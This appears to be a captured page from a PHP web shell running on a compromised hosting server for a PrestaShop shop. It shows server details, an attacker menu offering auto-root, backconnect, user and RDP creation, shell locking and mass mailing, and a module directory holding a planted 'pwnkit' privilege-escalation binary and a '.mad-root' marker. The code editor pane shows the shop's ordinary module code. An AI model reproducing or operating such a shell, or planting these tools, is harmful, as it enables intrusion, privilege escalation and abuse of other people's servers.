Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
modules /
blocklayered /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwx---r-x
img
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
upgrade
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.txt
1.14
KB
-rw----r--
autoload_classmap.php
0
B
-r--r--r--
blocklayered-15.css
3.19
KB
-rw----r--
blocklayered-ajax.php
1.22
KB
-rw----r--
blocklayered-attribute-indexer...
331
B
-rw----r--
blocklayered-footer.js
1.07
KB
-rw----r--
blocklayered-no-products.tpl
1.06
KB
-rw----r--
blocklayered-price-indexer.php
1.03
KB
-rw----r--
blocklayered-url-indexer.php
434
B
-rw----r--
blocklayered.css
2.65
KB
-rw----r--
blocklayered.js
18.79
KB
-rw----r--
blocklayered.php
136.86
KB
-rw----r--
blocklayered.tpl
13.97
KB
-rw----r--
config.xml
477
B
-rw----r--
delete.gif
213
B
-rw----r--
index.php
1.26
KB
-rw----r--
logo.gif
1.01
KB
-rw----r--
logo.png
1.32
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blocklayered-price-indexer.php
<?php include(dirname(__FILE__).'/../../config/config.inc.php'); include(dirname(__FILE__).'/blocklayered.php'); if (substr(Tools::encrypt('blocklayered/index'),0,10) != Tools::getValue('token') || !Module::isInstalled('blocklayered')) die('Bad token'); if (!Tools::getValue('ajax')) { // Case of nothing to do but showing a message (1) if (Tools::getValue('return_message') !== false) { echo '1'; die(); } if (Tools::usingSecureMode()) $domain = Tools::getShopDomainSsl(true); else $domain = Tools::getShopDomain(true); // Return a content without waiting the end of index execution header('Location: '.$domain.__PS_BASE_URI__.'modules/blocklayered/blocklayered-price-indexer.php?token='.Tools::getValue('token') .'&return_message='.(int)Tools::getValue('cursor')); flush(); } if(Tools::getValue('full')) { echo BlockLayered::fullPricesIndexProcess((int)Tools::getValue('cursor'), (int)Tools::getValue('ajax'), true); } else echo BlockLayered::pricesIndexProcess((int)Tools::getValue('cursor'), (int)Tools::getValue('ajax'));
Close